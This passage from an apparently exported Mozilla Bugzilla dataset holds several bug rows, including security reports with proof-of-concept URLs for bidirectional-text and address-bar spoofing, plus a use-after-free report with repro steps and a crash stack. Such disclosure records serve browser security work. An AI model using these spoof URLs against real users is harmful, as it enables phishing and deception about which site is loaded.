Both Firefox and Google Chrome seem to implement the same display algorithm for URLs with bidirectional text, which gives unexpected results if both the hostname and path contain RTL sequences. In particular, if the hostname ends with an RTL part, and the path starts with an RTL character, both are interpreted as a continuous RTL context and get visually re-ordered. This way part of the path ends up in the hostname and vice versa. This also means that an attacker can (visually) inject characters into the hostname which are on the IDN blocklist but don't get blocked here because they are actually part of the path segment, not the domain name.
**Proof of concept**
- [`https://www.mozilla.org.xn--tib.xn--9dbq2a/#%F0%90%A9%96/app/main`](https://www.mozilla.org.xn--tib.xn--9dbq2a/#%F0%90%A9%96/app/main) displays as `https://www.mozilla.org.𐩖#...`
- Also, an RTL-only hostname can trivially be shadowed by another RTL hostname: [`https://ק.קום/م.كوم/foo`](https://ק.קום/م.كوم/foo) requests `ק.קום` although visually `م.كوم` follows after the protocol part.
- Since numbers aren't strongly directional, one can also trivially spoof IP hosts. E.g., [`https://127.xn--9dbq2a/0.0.1/`](https://127.xn--9dbq2a/0.0.1/) and [`https://127.ק.קום/0.0.1/index.php`](https://127.ק.קום/0.0.1/index.php) both visually start with `https://127.0.0.1/` but request a different hostname.
All examples were tested on Linux + Nightly with default settings.</t>
        </is>
      </c>
      <c r="X4198" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4199">
      <c r="A4199" t="n">
        <v>245066</v>
      </c>
      <c r="B4199" t="inlineStr">
        <is>
          <t>2004-05-29 17:26:21 -0700</t>
        </is>
      </c>
      <c r="C4199" t="inlineStr">
        <is>
          <t>[internal] nsPop3Protocol.cpp, back out fix for bug #157644, since david has fixed the problem another way (bug #229374)</t>
        </is>
      </c>
      <c r="D4199" t="inlineStr">
        <is>
          <t>2009-01-22 10:17:31 -0800</t>
        </is>
      </c>
      <c r="E4199" t="n">
        <v>1</v>
      </c>
      <c r="F4199" t="n">
        <v>1</v>
      </c>
      <c r="G4199" t="n">
        <v>3</v>
      </c>
      <c r="H4199" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4199" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4199" t="inlineStr">
        <is>
          <t>Networking: POP</t>
        </is>
      </c>
      <c r="K4199" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4199" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4199" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4199" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4199" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4199" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q4199" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4199" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4199" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4199" t="n">
        <v>1</v>
      </c>
      <c r="U4199" t="n">
        <v>0</v>
      </c>
      <c r="V4199" t="n">
        <v>8</v>
      </c>
      <c r="W4199" t="inlineStr">
        <is>
          <t>[internal] nsPop3Protocol.cpp, back out fix for bug #157644, since david has
fixed the problem another way (bug #229374)
nsPop3Protocol.cpp</t>
        </is>
      </c>
      <c r="X4199" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4200">
      <c r="A4200" t="n">
        <v>1325955</v>
      </c>
      <c r="B4200" t="inlineStr">
        <is>
          <t>2016-12-27 07:43:14 -0800</t>
        </is>
      </c>
      <c r="C4200" t="inlineStr">
        <is>
          <t>Address bar spoofing on Android</t>
        </is>
      </c>
      <c r="D4200" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:29 -0700</t>
        </is>
      </c>
      <c r="E4200" t="n">
        <v>1</v>
      </c>
      <c r="F4200" t="n">
        <v>1</v>
      </c>
      <c r="G4200" t="n">
        <v>6</v>
      </c>
      <c r="H4200" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4200" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4200" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4200" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L4200" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4200" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4200" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4200" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4200" t="inlineStr">
        <is>
          <t>[adv-main53+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4200" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4200" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4200" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T4200" t="n">
        <v>1</v>
      </c>
      <c r="U4200" t="n">
        <v>0</v>
      </c>
      <c r="V4200" t="n">
        <v>46</v>
      </c>
      <c r="W4200" t="inlineStr">
        <is>
          <t>Created attachment 8822051
Screenshot_20161227-221200.png
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Steps to reproduce:
User Agent: "Mozilla/5.0 (Android 6.0.1; Mobile; rv:50.1.0) Gecko/50.1.0 Firefox/50.1.0"
POC:
http://192.243.113.21/spoof/firefox/url1.html
Actual results:
The fake top level domain has been highlighted and the site attribute is wrong(see screenshot).
Expected results:
The site attribute should display the correct domain.</t>
        </is>
      </c>
      <c r="X4200" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4201">
      <c r="A4201" t="n">
        <v>1090230</v>
      </c>
      <c r="B4201" t="inlineStr">
        <is>
          <t>2014-10-28 07:09:01 -0700</t>
        </is>
      </c>
      <c r="C4201" t="inlineStr">
        <is>
          <t>Answer API should return the number of "helpful" votes</t>
        </is>
      </c>
      <c r="D4201" t="inlineStr">
        <is>
          <t>2014-11-03 08:35:16 -0800</t>
        </is>
      </c>
      <c r="E4201" t="n">
        <v>1</v>
      </c>
      <c r="F4201" t="n">
        <v>1</v>
      </c>
      <c r="G4201" t="n">
        <v>5</v>
      </c>
      <c r="H4201" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4201" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4201" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K4201" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4201" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4201" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4201" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4201" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4201" t="inlineStr">
        <is>
          <t>u=dev c=buddyup p=1 s=2014.20</t>
        </is>
      </c>
      <c r="Q4201" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4201" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4201" t="inlineStr">
        <is>
          <t>2014Q4</t>
        </is>
      </c>
      <c r="T4201" t="n">
        <v>1</v>
      </c>
      <c r="U4201" t="n">
        <v>0</v>
      </c>
      <c r="V4201" t="n">
        <v>5</v>
      </c>
      <c r="W4201" t="inlineStr">
        <is>
          <t>So that we can display it in the UI.</t>
        </is>
      </c>
      <c r="X4201" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4202">
      <c r="A4202" t="n">
        <v>1185820</v>
      </c>
      <c r="B4202" t="inlineStr">
        <is>
          <t>2015-07-20 22:05:10 -0700</t>
        </is>
      </c>
      <c r="C4202" t="inlineStr">
        <is>
          <t>Use After Free in XMLHttpRequest::Open()</t>
        </is>
      </c>
      <c r="D4202" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:22 -0700</t>
        </is>
      </c>
      <c r="E4202" t="n">
        <v>1</v>
      </c>
      <c r="F4202" t="n">
        <v>1</v>
      </c>
      <c r="G4202" t="n">
        <v>3</v>
      </c>
      <c r="H4202" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4202" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4202" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K4202" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L4202" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4202" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4202" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4202" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4202" t="inlineStr">
        <is>
          <t>[adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q4202" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4202" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4202" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T4202" t="n">
        <v>1</v>
      </c>
      <c r="U4202" t="n">
        <v>0</v>
      </c>
      <c r="V4202" t="n">
        <v>28</v>
      </c>
      <c r="W4202" t="inlineStr">
        <is>
          <t>Created attachment 8636408
Uaf_XMLHttpRequest_Open.js
Use XMLHttpRequestf in Web Workers can have Use After Free.
Firefox version:42.0a1 (2015-07-16)
OS: Windows 7 64 bit
Steps to reproduce: 
1. Run server side script Uaf_XMLHttpRequest_Open.js in Node.js (node Uaf_XMLHttpRequest_Open.js).
2. Enter http://localhost:12345 in Firefox browser.
3. Firefox crashes in XMLHttpRequest::Open():
First-chance exception at 0x10AFD112 (xul.dll) in firefox.exe: 0xC0000005: Access violation writing location 0x0000005D.
Unhandled exception at 0x10AFD112 (xul.dll) in firefox.exe: 0xC0000005: Access violation writing location 0x0000005D.
The variables:
+		mProxy	{mRawPtr=0x5a5a5a5a {mWorkerPrivate=??? mXMLHttpRequestPrivate=??? mMozAnon=??? ...} }	nsRefPtr&lt;mozilla::dom::workers::Proxy&gt;
+		mWorkerPrivate	0x5a5a5a5a {mDebugger={mRawPtr=??? } mControlQueue={mStorage1={...} mStorage2={...} mFront=??? ...} ...}	mozilla::dom::workers::WorkerPrivate *
-		this	0x1e722100 {mUpload={mRawPtr=0x1c202118 {mXHR={mRawPtr=0x00000000 &lt;NULL&gt; } } } mWorkerPrivate=0x5a5a5a5a {...} ...}	mozilla::dom::workers::XMLHttpRequest *
+		nsXHREventTarget	{...}	nsXHREventTarget
+		mozilla::dom::workers::WorkerFeature	{...}	mozilla::dom::workers::WorkerFeature
+		mUpload	{mRawPtr=0x1c202118 {mXHR={mRawPtr=0x00000000 &lt;NULL&gt; } } }	nsRefPtr&lt;mozilla::dom::workers::XMLHttpRequestUpload&gt;
+		mWorkerPrivate	0x5a5a5a5a {mDebugger={mRawPtr=??? } mControlQueue={mStorage1={...} mStorage2={...} mFront=??? ...} ...}	mozilla::dom::workers::WorkerPrivate *
+		mProxy	{mRawPtr=0x5a5a5a5a {mWorkerPrivate=??? mXMLHttpRequestPrivate=??? mMozAnon=??? ...} }	nsRefPtr&lt;mozilla::dom::workers::Proxy&gt;
		mResponseType	0x5a5a5a5a	mozilla::dom::XMLHttpRequestResponseType
+		mStateData	{mResponseText={...} mResponseURL={...} mStatus=0x5a5a5a5a ...}	mozilla::dom::workers::XMLHttpRequest::StateData
		mTimeout	0x00000000	unsigned int
		mRooted	true (0x82)	bool
		mBackgroundRequest	true (0xff)	bool
		mWithCredentials	true (0xff)	bool
		mCanceled	true (0xff)	bool
		mMozAnon	false	bool
		mMozSystem	false	bool
0x1E722100  5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a c8 8b c2 11 dc 8b c2 11 01 00 00 00 40 11 71 00 18 21
The address byte pattern 0x5a5a5a5a indicates a Use After Free. The memory of the object was prematurely released in runnable-&gt;Dispatch(mWorkerPrivate-&gt;GetJSContext()).
The full call stack:
&gt;	xul.dll!mozilla::dom::workers::XMLHttpRequest::Open(const nsACString_internal &amp; aMethod, const nsAString_internal &amp; aUrl, bool aAsync, const mozilla::dom::Optional&lt;nsAString_internal&gt; &amp; aUser, const mozilla::dom::Optional&lt;nsAString_internal&gt; &amp; aPassword, mozilla::ErrorResult &amp; aRv) Line 1959	C++
 	xul.dll!mozilla::dom::XMLHttpRequestBinding_workers::open(JSContext * cx, JS::Handle&lt;JSObject *&gt; obj, mozilla::dom::workers::XMLHttpRequest * self, const JSJitMethodCallArgs &amp; args) Line 2169	C++
 	xul.dll!mozilla::dom::GenericBindingMethod(JSContext * cx, unsigned int argc, JS::Value * vp) Line 2577	C++
 	xul.dll!js::Invoke(JSContext * cx, JS::CallArgs args, js::MaybeConstruct construct) Line 720	C++
 	xul.dll!Interpret(JSContext * cx, js::RunState &amp; state) Line 2972	C++
 	xul.dll!js::RunScript(JSContext * cx, js::RunState &amp; state) Line 661	C++
 	xul.dll!js::Invoke(JSContext * cx, JS::CallArgs args, js::MaybeConstruct construct) Line 741	C++
 	xul.dll!js::Invoke(JSContext * cx, const JS::Value &amp; thisv, const JS::Value &amp; fval, unsigned int argc, const JS::Value * argv, JS::MutableHandle&lt;JS::Value&gt; rval) Line 775	C++
 	xul.dll!JS::Call(JSContext * cx, JS::Handle&lt;JS::Value&gt; thisv, JS::Handle&lt;JS::Value&gt; fval, const JS::HandleValueArray &amp; args, JS::MutableHandle&lt;JS::Value&gt; rval) Line 4585	C++
 	xul.dll!mozilla::dom::EventHandlerNonNull::Call(JSContext * cx, JS::Handle&lt;JS::Value&gt; aThisVal, mozilla::dom::Event &amp; event, JS::MutableHandle&lt;JS::Value&gt; aRetVal, mozilla::ErrorResult &amp; aRv) Line 260	C++
 	xul.dll!mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports *&gt;(nsISupports * const &amp; thisVal, mozilla::dom::Event &amp; event, JS::MutableHandle&lt;JS::Value&gt; aRetVal, mozilla::ErrorResult &amp; aRv, const char * aExecutionReason, mozilla::dom::CallbackObject::ExceptionHandling aExceptionHandling, JSCompartment * aCompartment) Line 351	C++
 	xul.dll!mozilla::JSEventHandler::HandleEvent(nsIDOMEvent * aEvent) Line 216	C++
 	xul.dll!mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener * aListener, nsIDOMEvent * aDOMEvent, mozilla::dom::EventTarget * aCurrentTarget) Line 995	C++
 	xul.dll!mozilla::EventListenerManager::HandleEventInternal(nsPresContext * aPresContext, mozilla::WidgetEvent * aEvent, nsIDOMEvent * * aDOMEvent, mozilla::dom::EventTarget * aCurrentTarget, nsEventStatus * aEventStatus) Line 1145	C++
 	xul.dll!mozilla::EventListenerManager::HandleEvent(nsPresContext * aPresContext, mozilla::WidgetEvent * aEvent, nsIDOMEvent * * aDOMEvent, mozilla::dom::EventTarget * aCurrentTarget, nsEventStatus * aEventStatus) Line 330	C++
 	xul.dll!mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor &amp; aVisitor, mozilla::ELMCreationDetector &amp; aCd) Line 209	C++
 	xul.dll!mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt; &amp; aChain, mozilla::EventChainPostVisitor &amp; aVisitor, mozilla::EventDispatchingCallback * aCallback, mozilla::ELMCreationDetector &amp; aCd) Line 301	C++
 	xul.dll!mozilla::EventDispatcher::Dispatch(nsISupports * aTarget, nsPresContext * aPresContext, mozilla::WidgetEvent * aEvent, nsIDOMEvent * aDOMEvent, nsEventStatus * aEventStatus, mozilla::EventDispatchingCallback * aCallback, nsTArray&lt;mozilla::dom::EventTarget *&gt; * aTargets) Line 638	C++
 	xul.dll!mozilla::EventDispatcher::DispatchDOMEvent(nsISupports * aTarget, mozilla::WidgetEvent * aEvent, nsIDOMEvent * aDOMEvent, nsPresContext * aPresContext, nsEventStatus * aEventStatus) Line 700	C++
 	xul.dll!nsWindowRoot::DispatchDOMEvent(mozilla::WidgetEvent * aEvent, nsIDOMEvent * aDOMEvent, nsPresContext * aPresContext, nsEventStatus * aEventStatus) Line 97	C++
 	xul.dll!`anonymous namespace'::EventRunnable::WorkerRun(JSContext * aCx, mozilla::dom::workers::WorkerPrivate * aWorkerPrivate) Line 1428	C++
 	xul.dll!mozilla::dom::workers::WorkerRunnable::Run() Line 363	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 867	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 277	C++
 	xul.dll!mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() Line 6190	C++
 	xul.dll!`anonymous namespace'::WorkerThreadProxySyncRunnable::Dispatch(JSContext * aCx) Line 547	C++
 	xul.dll!mozilla::dom::workers::XMLHttpRequest::Open(const nsACString_internal &amp; aMethod, const nsAString_internal &amp; aUrl, bool aAsync, const mozilla::dom::Optional&lt;nsAString_internal&gt; &amp; aUser, const mozilla::dom::Optional&lt;nsAString_internal&gt; &amp; aPassword, mozilla::ErrorResult &amp; aRv) Line 1958	C++
 	xul.dll!mozilla::dom::XMLHttpRequestBinding_workers::open(JSContext * cx, JS::Handle&lt;JSObject *&gt; obj, mozilla::dom::workers::XMLHttpRequest * self, const JSJitMethodCallArgs &amp; args) Line 2169	C++
 	xul.dll!mozilla::dom::GenericBindingMethod(JSContext * cx, unsigned int argc, JS::Value * vp) Line 2577	C++
 	xul.dll!js::Invoke(JSContext * cx, JS::CallArgs args, js::MaybeConstruct construct) Line 720	C++
 	xul.dll!Interpret(JSContext * cx, js::RunState &amp; state) Line 2972	C++
 	xul.dll!js::RunScript(JSContext * cx, js::RunState &amp; state) Line 661	C++
 	xul.dll!js::Invoke(JSContext * cx, JS::CallArgs args, js::MaybeConstruct construct) Line 741	C++
 	xul.dll!js::Invoke(JSContext * cx, const JS::Value &amp; thisv, const JS::Value &amp; fval, unsigned int argc, const JS::Value * argv, JS::MutableHandle&lt;JS::Value&gt; rval) Line 775	C++
 	xul.dll!JS::Call(JSContext * cx, JS::Handle&lt;JS::Value&gt; thisv, JS::Handle&lt;JS::Value&gt; fval, const JS::HandleValueArray &amp; args, JS::MutableHandle&lt;JS::Value&gt; rval) Line 4585	C++
 	xul.dll!mozilla::dom::EventHandlerNonNull::Call(JSContext * cx, JS::Handle&lt;JS::Value&gt; aThisVal, mozilla::dom::Event &amp; event, JS::MutableHandle&lt;JS::Value&gt; aRetVal, mozilla::ErrorResult &amp; aRv) Line 260	C++
 	xul.dll!mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports *&gt;(nsISupports * const &amp; thisVal, mozilla::dom::Event &amp; event, JS::MutableHandle&lt;JS::Value&gt; aRetVal, mozilla::ErrorResult &amp; aRv, const char * aExecutionReason, mozilla::dom::CallbackObject::ExceptionHandling aExceptionHandling, JSCompartment * aCompartment) Line 351	C++
 	xul.dll!mozilla::JSEventHandler::HandleEvent(nsIDOMEvent * aEvent) Line 216	C++
 	xul.dll!mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener * aListener, nsIDOMEvent * aDOMEvent, mozilla::dom::EventTarget * aCurrentTarget) Line 995	C++
 	xul.dll!mozilla::EventListenerManager::HandleEventInternal(nsPresContext * aPresContext, mozilla::WidgetEvent * aEvent, nsIDOMEvent * * aDOMEvent, mozilla::dom::EventTarget * aCurrentTarget, nsEventStatus * aEventStatus) Line 1145	C++
 	xul.dll!mozilla::EventListenerManager::HandleEvent(nsPresContext * aPresContext, mozilla::WidgetEvent * aEvent, nsIDOMEvent * * aDOMEvent, mozilla::dom::EventTarget * aCurrentTarget, nsEventStatus * aEventStatus) Line 330	C++
 	xul.dll!mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor &amp; aVisitor, mozilla::ELMCreationDetector &amp; aCd) Line 209	C++
 	xul.dll!mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt; &amp; aChain, mozilla::EventChainPostVisitor &amp; aVisitor, mozilla::EventDispatchingCallback * aCallback, mozilla::ELMCreationDetector &amp; aCd) Line 301	C++
 	xul.dll!mozilla::EventDispatcher::Dispatch(nsISupports * aTarget, nsPresContext * aPresContext, mozilla::WidgetEvent * aEvent, nsIDOMEvent * aDOMEvent, nsEventStatus * aEventStatus, mozilla::EventDispatchingCallback * aCallback, nsTArray&lt;mozilla::dom::EventTarget *&gt; * aTargets) Line 638	C++
 	xul.dll!mozilla::EventDispatcher::DispatchDOMEvent(nsISupports * aTarget, mozilla::WidgetEvent * aEvent, nsIDOMEvent * aDOMEvent, nsPresContext * aPresContext, nsEventStatus * aEventStatus) Line 700	C++
 	xul.dll!nsWindowRoot::DispatchDOMEvent(mozilla::WidgetEvent * aEvent, nsIDOMEvent * aDOMEvent, nsPresContext * aPresContext, nsEventStatus * aEventStatus) Line 97	C++
 	xul.dll!mozilla::dom::workers::XMLHttpRequest::DispatchPrematureAbortEvent(mozilla::dom::EventTarget * aTarget, const nsAString_internal &amp; aEventType, bool aUploadTarget, mozilla::ErrorResult &amp; aRv) Line 1834	C++
 	xul.dll!mozilla::dom::workers::XMLHttpRequest::MaybeDispatchPrematureAbortEvents(mozilla::ErrorResult &amp; aRv) Line 1767	C++
 	xul.dll!mozilla::dom::workers::XMLHttpRequest::Open(const nsACString_internal &amp; aMethod, const nsAString_internal &amp; aUrl, bool aAsync, const mozilla::dom::Optional&lt;nsAString_internal&gt; &amp; aUser, const mozilla::dom::Optional&lt;nsAString_internal&gt; &amp; aPassword, mozilla::ErrorResult &amp; aRv) Line 1942	C++
 	xul.dll!mozilla::dom::XMLHttpRequestBinding_workers::open(JSContext * cx, JS::Handle&lt;JSObject *&gt; obj, mozilla::dom::workers::XMLHttpRequest * self, const JSJitMethodCallArgs &amp; args) Line 2169	C++
 	xul.dll!mozilla::dom::GenericBindingMethod(JSContext * cx, unsigned int argc, JS::Value * vp) Line 2577	C++
 	xul.dll!js::Invoke(JSContext * cx, JS::CallArgs args, js::MaybeConstruct construct) Line 720	C++
 	xul.dll!Interpret(JSContext * cx, js::RunState &amp; state) Line 2972	C++
 	xul.dll!js::RunScript(JSContext * cx, js::RunState &amp; state) Line 661	C++
 	xul.dll!js::Invoke(JSContext * cx, JS::CallArgs args, js::MaybeConstruct construct) Line 741	C++
 	xul.dll!js::Invoke(JSContext * cx, const JS::Value &amp; thisv, const JS::Value &amp; fval, unsigned int argc, const JS::Value * argv, JS::MutableHandle&lt;JS::Value&gt; rval) Line 775	C++
 	xul.dll!JS::Call(JSContext * cx, JS::Handle&lt;JS::Value&gt; thisv, JS::Handle&lt;JS::Value&gt; fval, const JS::HandleValueArray &amp; args, JS::MutableHandle&lt;JS::Value&gt; rval) Line 4585	C++
 	xul.dll!mozilla::dom::EventHandlerNonNull::Call(JSContext * cx, JS::Handle&lt;JS::Value&gt; aThisVal, mozilla::dom::Event &amp; event, JS::MutableHandle&lt;JS::Value&gt; aRetVal, mozilla::ErrorResult &amp; aRv) Line 260	C++
 	xul.dll!mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports *&gt;(nsISupports * const &amp; thisVal, mozilla::dom::Event &amp; event, JS::MutableHandle&lt;JS::Value&gt; aRetVal, mozilla::ErrorResult &amp; aRv, const char * aExecutionReason, mozilla::dom::CallbackObject::ExceptionHandling aExceptionHandling, JSCompartment * aCompartment) Line 351	C++
 	xul.dll!mozilla::JSEventHandler::HandleEvent(nsIDOMEvent * aEvent) Line 216	C++
 	xul.dll!mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener * aListener, nsIDOMEvent * aDOMEvent, mozilla::dom::EventTarget * aCurrentTarget) Line 995	C++
 	xul.dll!mozilla::EventListenerManager::HandleEventInternal(nsPresContext * aPresContext, mozilla::WidgetEvent * aEvent, nsIDOMEvent * * aDOMEvent, mozilla::dom::EventTarget * aCurrentTarget, nsEventStatus * aEventStatus) Line 1145	C++
 	xul.dll!mozilla::EventListenerManager::HandleEvent(nsPresContext * aPresContext, mozilla::WidgetEvent * aEvent, nsIDOMEvent * * aDOMEvent, mozilla::dom::EventTarget * aCurrentTarget, nsEventStatus * aEventStatus) Line 330	C++
 	xul.dll!mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor &amp; aVisitor, mozilla::ELMCreationDetector &amp; aCd) Line 209	C++
 	xul.dll!mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt; &amp; aChain, mozilla::EventChainPostVisitor &amp; aVisitor, mozilla::EventDispatchingCallback * aCallback, mozilla::ELMCreationDetector &amp; aCd) Line 301	C++
 	xul.dll!mozilla::EventDispatcher::Dispatch(nsISupports * aTarget, nsPresContext * aPresContext, mozilla::WidgetEvent * aEvent, nsIDOMEvent * aDOMEvent, nsEventStatus * aEventStatus, mozilla::EventDispatchingCallback * aCallback, nsTArray&lt;mozilla::dom::EventTarget *&gt; * aTargets) Line 638	C++
 	xul.dll!mozilla::EventDispatcher::DispatchDOMEvent(nsISupports * aTarget, mozilla::WidgetEvent * aEvent, nsIDOMEvent * aDOMEvent, nsPresContext * aPresContext, nsEventStatus * aEventStatus) Line 700	C++
 	xul.dll!nsWindowRoot::DispatchDOMEvent(mozilla::WidgetEvent * aEvent, nsIDOMEvent * aDOMEvent, nsPresContext * aPresContext, nsEventStatus * aEventStatus) Line 97	C++
 	xul.dll!`anonymous namespace'::EventRunnable::WorkerRun(JSContext * aCx, mozilla::dom::workers::WorkerPrivate * aWorkerPrivate) Line 1428	C++
 	xul.dll!mozilla::dom::workers::WorkerRunnable::Run() Line 363	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 867	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 277	C++
 	xul.dll!mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext * aCx) Line 5367	C++
 	xul.dll!`anonymous namespace'::WorkerThreadPrimaryRunnable::Run() Line 2838	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 867	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 277	C++
 	xul.dll!mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate * aDelegate) Line 326	C++
 	xul.dll!MessageLoop::RunHandler() Line 228	C++
 	xul.dll!MessageLoop::Run() Line 202	C++
 	xul.dll!nsThread::ThreadFunc(void * aArg) Line 362	C++
 	nss3.dll!_PR_NativeRunThread(void * arg) Line 419	C
 	nss3.dll!pr_root(void * arg) Line 90	C
 	msvcr120.dll!__beginthreadex()	Unknown
 	msvcr120.dll!__endthreadex()	Unknown
 	kernel32.dll!@BaseThreadInitThunk@12()	Unknown
 	ntdll.dll!___RtlUserThreadStart@8()	Unknown
 	ntdll.dll!__RtlUserThreadStart@8()	Unknown</t>
        </is>
      </c>
      <c r="X4202" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4203">
      <c r="A4203" t="n">
        <v>1043741</v>
      </c>
      <c r="B4203" t="inlineStr">
        <is>
          <t>2014-07-24 18:27:01 -0700</t>
        </is>
      </c>
      <c r="C4203" t="inlineStr">
        <is>
          <t>Logviewer: Use buildbot buildstep 'results' code for step pass/fail determination</t>
        </is>
      </c>
      <c r="D4203" t="inlineStr">
        <is>
          <t>2015-05-20 04:27:45 -0700</t>
        </is>
      </c>
      <c r="E4203" t="n">
        <v>1</v>
      </c>
      <c r="F4203" t="n">
        <v>1</v>
      </c>
      <c r="G4203" t="n">
        <v>7</v>
      </c>
      <c r="H4203" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4203" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4203" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4203" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4203" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4203" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4203" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4203" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4203" t="inlineStr">
        <is>
          <t>[good first bug]</t>
        </is>
      </c>
      <c r="Q4203" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4203" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4203" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4203" t="n">
        <v>1</v>
      </c>
      <c r="U4203" t="n">
        <v>0</v>
      </c>
      <c r="V4203" t="n">
        <v>21</v>
      </c>
      <c r="W4203" t="inlineStr">
        <is>
          <t>There are many errors, especially on windows, that are unknown to the structured log parser, and in such cases, all steps are considered and displayed green, despite "failed" being the status of one of those steps.
